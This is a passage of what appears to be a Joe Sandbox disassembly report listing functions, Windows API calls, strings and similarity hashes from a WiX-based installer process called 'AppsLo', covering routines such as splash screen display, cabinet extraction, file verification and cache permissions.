Opcode ID: 972f31562c1bb7ad020f3ba476a0c05e5b6b9a8bbd26fc026dc100dcaabc2cba
Instruction ID: 071dccedc2b27090011c61125d5dc60a83a8da51375e3c386ca75c5ee932c505
Opcode Fuzzy Hash: 972f31562c1bb7ad020f3ba476a0c05e5b6b9a8bbd26fc026dc100dcaabc2cba
Instruction Fuzzy Hash: 9F319476D0122ABFDB109FA98D85AEFBABCFF04360F110165F914F7340E6309E008AA1

Function 008BE645 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 97threadCOMMON

Download Yara Rule

APIs

CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,00000000,00000000,?,?,008A548E,?,?), ref: 008BE666
GetLastError.KERNEL32(?,?,008A548E,?,?), ref: 008BE673
CreateThread.KERNEL32(00000000,00000000,008BE3C8,00000000,00000000,00000000), ref: 008BE6D2
GetLastError.KERNEL32(?,?,008A548E,?,?), ref: 008BE6DF
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,008A548E,?,?), ref: 008BE71A
CloseHandle.KERNEL32(?,?,?,008A548E,?,?), ref: 008BE72E
CloseHandle.KERNEL32(?,?,?,008A548E,?,?), ref: 008BE73B

Strings

splashscreen.cpp, xrefs: 008BE694, 008BE700
Failed to create modal event., xrefs: 008BE69E
Failed to create UI thread., xrefs: 008BE70A

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: CloseCreateErrorHandleLast$EventMultipleObjectsThreadWait
String ID: Failed to create UI thread.$Failed to create modal event.$splashscreen.cpp
API String ID: 2351989216-1977201954
Opcode ID: 62538354900520df3ae1aadcec9f9fde76611063eabef30c58f068805322a88d
Instruction ID: cb6896d5ff73196a3dc4dae6e489c0a40c2eb833a8519b9102ea8a0c27055f1b
Opcode Fuzzy Hash: 62538354900520df3ae1aadcec9f9fde76611063eabef30c58f068805322a88d
Instruction Fuzzy Hash: 19317E76D4022ABFDB219B998C45AEFBBB8FF55710F114166EE20F6250E6345A00CAA1

Function 008C14E1 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 91threadCOMMON

Download Yara Rule

APIs

WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,76232F60,?,?,008A5405,008A53BD,00000000,008A5445), ref: 008C1506
GetLastError.KERNEL32 ref: 008C1519
GetExitCodeThread.KERNEL32(008EB488,?), ref: 008C155B
GetLastError.KERNEL32 ref: 008C1569
ResetEvent.KERNEL32(008EB460), ref: 008C15A4
GetLastError.KERNEL32 ref: 008C15AE

Strings

Failed to reset operation complete event., xrefs: 008C15DF
Failed to get extraction thread exit code., xrefs: 008C159A
cabextract.cpp, xrefs: 008C1540, 008C1590, 008C15D5
Failed to wait for operation complete event., xrefs: 008C154A

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: ErrorLast$CodeEventExitMultipleObjectsResetThreadWait
String ID: Failed to get extraction thread exit code.$Failed to reset operation complete event.$Failed to wait for operation complete event.$cabextract.cpp
API String ID: 2979751695-3400260300
Opcode ID: c9ca69ccf61cc70eff8faf4bcb9971590e6a5705108f9b89dc06b42d8635b3f7
Instruction ID: d96406506f2db609ae29cbf14c18b40d8512ad5085f52cf8165e5b25e2435756
Opcode Fuzzy Hash: c9ca69ccf61cc70eff8faf4bcb9971590e6a5705108f9b89dc06b42d8635b3f7
Instruction Fuzzy Hash: 5F31B8B0B40206ABEB109FA98D85F7F7BF8FF45710B10416EF915DA261E774D9009B51

Function 008C15FE Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 82synchronizationCOMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(008EB478,?,00000000,?,008AC1D3,?,008A53BD,00000000,?,008B784D,?,008A566D,008A5479,008A5479,00000000,?), ref: 008C161B
GetLastError.KERNEL32(?,008AC1D3,?,008A53BD,00000000,?,008B784D,?,008A566D,008A5479,008A5479,00000000,?,008A5489,FFF9E89D,008A5489), ref: 008C1625
WaitForSingleObject.KERNEL32(008EB488,000000FF,?,008AC1D3,?,008A53BD,00000000,?,008B784D,?,008A566D,008A5479,008A5479,00000000,?,008A5489), ref: 008C165F
GetLastError.KERNEL32(?,008AC1D3,?,008A53BD,00000000,?,008B784D,?,008A566D,008A5479,008A5479,00000000,?,008A5489,FFF9E89D,008A5489), ref: 008C1669
CloseHandle.KERNEL32(00000000,008A5489,?,00000000,?,008AC1D3,?,008A53BD,00000000,?,008B784D,?,008A566D,008A5479,008A5479,00000000), ref: 008C16B4
CloseHandle.KERNEL32(00000000,008A5489,?,00000000,?,008AC1D3,?,008A53BD,00000000,?,008B784D,?,008A566D,008A5479,008A5479,00000000), ref: 008C16C3
CloseHandle.KERNEL32(00000000,008A5489,?,00000000,?,008AC1D3,?,008A53BD,00000000,?,008B784D,?,008A566D,008A5479,008A5479,00000000), ref: 008C16D2

Strings

cabextract.cpp, xrefs: 008C1649, 008C168D
Failed to wait for thread to terminate., xrefs: 008C1697
Failed to set begin operation event., xrefs: 008C1653

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: CloseHandle$ErrorLast$EventObjectSingleWait
String ID: Failed to set begin operation event.$Failed to wait for thread to terminate.$cabextract.cpp
API String ID: 1206859064-226982402
Opcode ID: cac5ddbaca75e788158e90361ce3a67c9b3d7f4c31caaccab721fa6b7907518c
Instruction ID: 448b0aa720c9710bd6e2e725bb18c788c0b0ba1bc520f84b2ba2a7831a59bbd0
Opcode Fuzzy Hash: cac5ddbaca75e788158e90361ce3a67c9b3d7f4c31caaccab721fa6b7907518c
Instruction Fuzzy Hash: AE213732500A32B7DB215B65CC8DF16B6B0FF15721F150228F918E5EA1D778E850CAD9

Function 008B41EC Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 55COMMON

Download Yara Rule

APIs

Part of subcall function 008E0523: EnterCriticalSection.KERNEL32(0090B5FC,00000000,?,?,?,008B4207,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,008A54FA,?), ref: 008E0533
Part of subcall function 008E0523: LeaveCriticalSection.KERNEL32(0090B5FC,?,?,0090B5F4,?,008B4207,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,008A54FA,?), ref: 008E067A

OpenEventLogW.ADVAPI32(00000000,Application), ref: 008B4212
GetLastError.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,?,?,?,?), ref: 008B421E
ReportEventW.ADVAPI32(00000000,00000001,00000001,00000001,00000000,00000001,00000000,008F39D4,00000000), ref: 008B426B
CloseEventLog.ADVAPI32(00000000), ref: 008B4272

Strings

logging.cpp, xrefs: 008B4242
Failed to open Application event log, xrefs: 008B424C
txt, xrefs: 008B41F2
_Failed, xrefs: 008B41F7
Setup, xrefs: 008B41FC
Application, xrefs: 008B420C

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: Event$CriticalSection$CloseEnterErrorLastLeaveOpenReport
String ID: Application$Failed to open Application event log$Setup$_Failed$logging.cpp$txt
API String ID: 1844635321-1389066741
Opcode ID: 6c66a868731746efa39b09b5b3e16727666154e3330bb60011738bb028429b13
Instruction ID: 905110b869709f269ffe52593d7f0d85ce53dbcb579576e5c0c8b13f3f36f4c1
Opcode Fuzzy Hash: 6c66a868731746efa39b09b5b3e16727666154e3330bb60011738bb028429b13
Instruction Fuzzy Hash: 5CF08132A81AB67A963226B65C1EDBB5C6CFA82F317010114BE20F5382DB489D0195F5

Function 008B93FE Relevance: 16.7, APIs: 2, Strings: 9, Instructions: 226COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(000007D0,000007D0,00000000,00000000,?,00000000,00000000,00000003,00000000,00000000), ref: 008B949E
GetLastError.KERNEL32(000007D0,000007D0,00000000,00000000,000007D0,00000001), ref: 008B94C6

Strings

$, xrefs: 008B959D
Failed to allocate memory, xrefs: 008B946F
Could not close verify handle., xrefs: 008B9655
Failed to encode file hash., xrefs: 008B9551
Failed to get file hash., xrefs: 008B94F0
0, xrefs: 008B955E
Failed to allocate string., xrefs: 008B9534
cache.cpp, xrefs: 008B94E6, 008B95FA, 008B964B
Could not verify file %ls., xrefs: 008B9607

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: ErrorLast
String ID: $$0$Could not close verify handle.$Could not verify file %ls.$Failed to allocate memory$Failed to allocate string.$Failed to encode file hash.$Failed to get file hash.$cache.cpp
API String ID: 1452528299-4263581490
Opcode ID: a3b04a13f97519333348dcfd15453a00588a96e128e6b733117e34c8a56cc49e
Instruction ID: 92fcece577748c580efce9d3e5abfe6a98cdda10a8c050dda8391073e1cac44b
Opcode Fuzzy Hash: a3b04a13f97519333348dcfd15453a00588a96e128e6b733117e34c8a56cc49e
Instruction Fuzzy Hash: 9F716272D4022DABDB21DFA8C841AEEBBB8FB15710F110126EA55FB351E7749D408BA1

Function 008BE56C Relevance: 16.6, APIs: 11, Instructions: 86windowCOMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 008BE577
DefWindowProcW.USER32(?,00000082,?,?), ref: 008BE5B5
SetWindowLongW.USER32(?,000000EB,00000000), ref: 008BE5C2
SetWindowLongW.USER32(?,000000EB,?), ref: 008BE5D1
DefWindowProcW.USER32(?,?,?,?), ref: 008BE5DF
CreateCompatibleDC.GDI32(?), ref: 008BE5EB
SelectObject.GDI32(00000000,00000000), ref: 008BE5FC
StretchBlt.GDI32(?,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00CC0020), ref: 008BE61E
SelectObject.GDI32(00000000,00000000), ref: 008BE626
DeleteDC.GDI32(00000000), ref: 008BE629
PostQuitMessage.USER32(00000000), ref: 008BE637

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: Window$Long$ObjectProcSelect$CompatibleCreateDeleteMessagePostQuitStretch
String ID:
API String ID: 409979828-0
Opcode ID: fcc3c16c9f9d0545e24833aa2ab3b2229220b21b1fb10fee1506af9cf128984f
Instruction ID: 5daf20dd49018f57ea7e967e0a5645e3c503db664cfd05ad5ccdd1758aab74c6
Opcode Fuzzy Hash: fcc3c16c9f9d0545e24833aa2ab3b2229220b21b1fb10fee1506af9cf128984f
Instruction Fuzzy Hash: 13217832100248BFDB255F68DC89DBB3BA8FB5A364B054618F616DA2B4D7319810EB60

Function 008BA13A Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 222COMMON

Download Yara Rule

Strings

Failed to combine last source with source., xrefs: 008BA210
WixBundleLastUsedSource, xrefs: 008BA1A1
Failed to copy source path., xrefs: 008BA31A
WixBundleLayoutDirectory, xrefs: 008BA26C
WixBundleOriginalSource, xrefs: 008BA1B7
Failed to get bundle layout directory property., xrefs: 008BA287
Failed to combine layout source with source., xrefs: 008BA2A4
Failed to get current process directory., xrefs: 008BA1F3

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: Find$CloseFileFirstlstrlen
String ID: Failed to combine last source with source.$Failed to combine layout source with source.$Failed to copy source path.$Failed to get bundle layout directory property.$Failed to get current process directory.$WixBundleLastUsedSource$WixBundleLayoutDirectory$WixBundleOriginalSource
API String ID: 2767606509-3003062821
Opcode ID: 37d71f49bee55a305349770c1808e36b102929a9c32070b2ef64502ac3cfc56b
Instruction ID: 6da19d2cf940662ed30cccc65058003d408e399618b5762a019aa8ac36e990a2
Opcode Fuzzy Hash: 37d71f49bee55a305349770c1808e36b102929a9c32070b2ef64502ac3cfc56b
Instruction Fuzzy Hash: 63715A71D05219ABDF1ADFA8C841AEEB7B9FF09314F100129E911F7360E7759D408BA2

Function 008ACBC5 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 144COMMON

Download Yara Rule

APIs

CompareStringW.KERNEL32(0000007F,00000000,FFFEB88D,000000FF,00000001,000000FF,?,00000001,008A53BD,00000000,008A5489,008A5445,WixBundleUILevel,840F01E8,?,00000001), ref: 008ACC1C

Strings

Failed to get next stream., xrefs: 008ACD03
Failed to concat file paths., xrefs: 008ACCFC
Failed to get directory portion of local file path, xrefs: 008ACCF5
payload.cpp, xrefs: 008ACD1D
Failed to extract file., xrefs: 008ACCE7
Failed to find embedded payload: %ls, xrefs: 008ACC48
Failed to ensure directory exists, xrefs: 008ACCEE
Payload was not found in container: %ls, xrefs: 008ACD29

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: CompareString
String ID: Failed to concat file paths.$Failed to ensure directory exists$Failed to extract file.$Failed to find embedded payload: %ls$Failed to get directory portion of local file path$Failed to get next stream.$Payload was not found in container: %ls$payload.cpp
API String ID: 1825529933-1711239286
Opcode ID: 012344aa38bdc6c822fad3ea00d66a63765c0e5b8eb8dc95ee6177baf4d65762
Instruction ID: 2f03b68bb077832907209241bcf3af35a56f744c319faea978944510d3c96665
Opcode Fuzzy Hash: 012344aa38bdc6c822fad3ea00d66a63765c0e5b8eb8dc95ee6177baf4d65762
Instruction Fuzzy Hash: 7741F231901219EBEF259F49CC819AEBBA4FF42720B108179E915EBB52D3749D40DB91

Function 008A4796 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 128windowthreadCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(00000000,00000000,00000400,00000400,00000000), ref: 008A47BB
GetCurrentThreadId.KERNEL32 ref: 008A47C1
GetMessageW.USER32(00000000,00000000,00000000,00000000), ref: 008A484F

Strings

user.cpp, xrefs: 008A489B
Unexpected return value from message pump., xrefs: 008A48A5
wininet.dll, xrefs: 008A47EE
Failed to load UX., xrefs: 008A4804
Failed to create user for UX., xrefs: 008A47DB
Failed to start bootstrapper application., xrefs: 008A481D

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: Message$CurrentPeekThread
String ID: Failed to create user for UX.$Failed to load UX.$Failed to start bootstrapper application.$Unexpected return value from message pump.$user.cpp$wininet.dll
API String ID: 673430819-2573580774
Opcode ID: 943a32aacddf38ed79043c0de0542bd2da53c6c74e96e9722da3f5cbc946249b
Instruction ID: cf9d8ebbc4d802dc4e68b1089b161e32ad06906e0419efde5a32a36efe16229c
Opcode Fuzzy Hash: 943a32aacddf38ed79043c0de0542bd2da53c6c74e96e9722da3f5cbc946249b
Instruction Fuzzy Hash: 3941C171A00699BFEB109BA4DC85EBBB7ACFF46314F100135FA14E7690DB68AD4187A1

Function 008C9C84 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 128COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000,?,?,008CB03E,?,00000001,00000000), ref: 008C9D0F
GetLastError.KERNEL32(?,?,?,00000000,00000000,00000000,?,?,008CB03E,?,00000001,00000000,00000000,00000000,00000001,00000000), ref: 008C9D19
CopyFileExW.KERNEL32(00000000,00000000,008C9B69,?,?,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 008C9D67
GetLastError.KERNEL32(?,?,?,00000000,00000000,00000000,?,?,008CB03E,?,00000001,00000000,00000000,00000000,00000001,00000000), ref: 008C9D96

Strings

Failed to clear readonly bit on payload destination path: %ls, xrefs: 008C9D48
copy, xrefs: 008C9CDD
BA aborted copy of payload from: '%ls' to: %ls., xrefs: 008C9D8F
Failed attempt to copy payload from: '%ls' to: %ls., xrefs: 008C9DC8
apply.cpp, xrefs: 008C9D3D, 008C9D81, 008C9DBA

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: ErrorFileLast$AttributesCopy
String ID: BA aborted copy of payload from: '%ls' to: %ls.$Failed attempt to copy payload from: '%ls' to: %ls.$Failed to clear readonly bit on payload destination path: %ls$apply.cpp$copy
API String ID: 1969131206-836986073
Opcode ID: 8b0e48cd78558ee531916863c2b14f5f9b78a1ee523710ac257d8d1dd86b5043
Instruction ID: 11636223f7cf7681c4168167896a091139449605f5d30e3bda9475c221660cac
Opcode Fuzzy Hash: 8b0e48cd78558ee531916863c2b14f5f9b78a1ee523710ac257d8d1dd86b5043
Instruction Fuzzy Hash: 6931F572A01125B7DB209AA68C49F7B7778FF42B21B1481ACFE55FB251E634CD00C6E1

Function 008B8EBC Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 126COMMON

Download Yara Rule

APIs

LocalFree.KERNEL32(00000000,?,00000001,80000005,?,00000000,00000000,00000000,00000003,000007D0), ref: 008B9007

Strings

Failed to secure cache path: %ls, xrefs: 008B8FEA
Failed to allocate access for Users group to path: %ls, xrefs: 008B8F72
Failed to create ACL to secure cache path: %ls, xrefs: 008B8FBB
Failed to allocate access for Everyone group to path: %ls, xrefs: 008B8F51
Failed to allocate access for SYSTEM group to path: %ls, xrefs: 008B8F30
Failed to allocate access for Administrators group to path: %ls, xrefs: 008B8F0F
cache.cpp, xrefs: 008B8FB0

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: FreeLocal
String ID: Failed to allocate access for Administrators group to path: %ls$Failed to allocate access for Everyone group to path: %ls$Failed to allocate access for SYSTEM group to path: %ls$Failed to allocate access for Users group to path: %ls$Failed to create ACL to secure cache path: %ls$Failed to secure cache path: %ls$cache.cpp
API String ID: 2826327444-4113288589
Opcode ID: f968e7f8ac70308a67a5798380d2e7721da6f0d4cdfe6c5b8d2c3861dd6610e7
Instruction ID: edc1269369a82361fd12a7a39db83e284513a733e2c61c89702407de485e8b52
Opcode Fuzzy Hash: f968e7f8ac70308a67a5798380d2e7721da6f0d4cdfe6c5b8d2c3861dd6610e7
Instruction Fuzzy Hash: F441C332A4072AE7EB2196548C02FFA7A6DFB51B10F110064FB14FA381DE75AE44CBA1

Function 008B492F Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 117fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(00000000,crypt32.dll,00000008,?,00000000,?,00000000,00000000,crypt32.dll,00000000,?,?,?,00000000,?,00000000), ref: 008B495A
GetLastError.KERNEL32 ref: 008B4967
ReadFile.KERNEL32(?,00000000,?,?,00000000,?,00000000), ref: 008B4A12
GetLastError.KERNEL32 ref: 008B4A1C

Strings

Failed to read data for message., xrefs: 008B4A4A
Failed to allocate data for message., xrefs: 008B49D0
pipe.cpp, xrefs: 008B49C6, 008B49DD, 008B4A40
Failed to read message from pipe., xrefs: 008B49E7
crypt32.dll, xrefs: 008B4956

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: ErrorFileLastRead
String ID: Failed to allocate data for message.$Failed to read data for message.$Failed to read message from pipe.$crypt32.dll$pipe.cpp
API String ID: 1948546556-773887359
Opcode ID: 5f271fa4fb902579edc9e4aef83343ea53f38f21936365c00a5b25348be7f9ed
Instruction ID: 44556dc2e1f9a7966f5d0b797fa7a72000753aad36938ba40170254a47c3f5cf
Opcode Fuzzy Hash: 5f271fa4fb902579edc9e4aef83343ea53f38f21936365c00a5b25348be7f9ed
Instruction Fuzzy Hash: 8E31D732D80239ABDB209AA58C47BEBBB68FB04721F10A135FD50E6352D774AD5087D4

Function 008E6C29 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 114COMMON

Download Yara Rule

APIs

CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,name,000000FF,00000000,00000000,00000000,?,7622DFD0), ref: 008E6C88
CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,email,000000FF), ref: 008E6CA5
SysFreeString.OLEAUT32(00000000), ref: 008E6CE3
SysFreeString.OLEAUT32(00000000), ref: 008E6D27

Strings

uri, xrefs: 008E6CB3
name, xrefs: 008E6C7A
email, xrefs: 008E6C97
`Dv, xrefs: 008E6CE3, 008E6D27

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: String$CompareFree
String ID: `Dv$email$name$uri
API String ID: 3589242889-3963012511
Opcode ID: 97cd120c7907a577d88b6a8f1e7a1d6fe2572a0ee8d770388131d922a54ede3e
Instruction ID: 6a3c92b857c21a756a3a0af938fa0fd1f26de176986fc4054c55abb13afdbd62
Opcode Fuzzy Hash: 97cd120c7907a577d88b6a8f1e7a1d6fe2572a0ee8d770388131d922a54ede3e
Instruction Fuzzy Hash: 53419E31A01259BBDB119B95CD45FAEBB78FF16365F2042A4E920EB2E0D7319E20DB50

Function 008BE2AF Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 104windowCOMMON

Download Yara Rule

APIs

LoadBitmapW.USER32(?,00000001), ref: 008BE2E5
GetLastError.KERNEL32 ref: 008BE2F1
GetObjectW.GDI32(00000000,00000018,?), ref: 008BE338
GetCursorPos.USER32(?), ref: 008BE359
MonitorFromPoint.USER32(?,?,00000002), ref: 008BE36B
GetMonitorInfoW.USER32(00000000,?), ref: 008BE381

Strings

Failed to load splash screen bitmap., xrefs: 008BE31F
splashscreen.cpp, xrefs: 008BE315
(, xrefs: 008BE378

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: Monitor$BitmapCursorErrorFromInfoLastLoadObjectPoint
String ID: ($Failed to load splash screen bitmap.$splashscreen.cpp
API String ID: 2342928100-598475503
Opcode ID: f6dc7d5d62c5e3a0e65c5c30f2f5a73e0af3a7d7e7847175193ea207bdf0a5de
Instruction ID: 3d240ce70700828ae46fb5822f00ae459b5ce0617c6eba762c99ebd67fce8a18
Opcode Fuzzy Hash: f6dc7d5d62c5e3a0e65c5c30f2f5a73e0af3a7d7e7847175193ea207bdf0a5de
Instruction Fuzzy Hash: 96313071A00619AFDB10DFB8D989ADEBBF4FF08711F148119E914EB385DB70E9008BA1

Function 008B50CA Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 84COMMON

Download Yara Rule

APIs

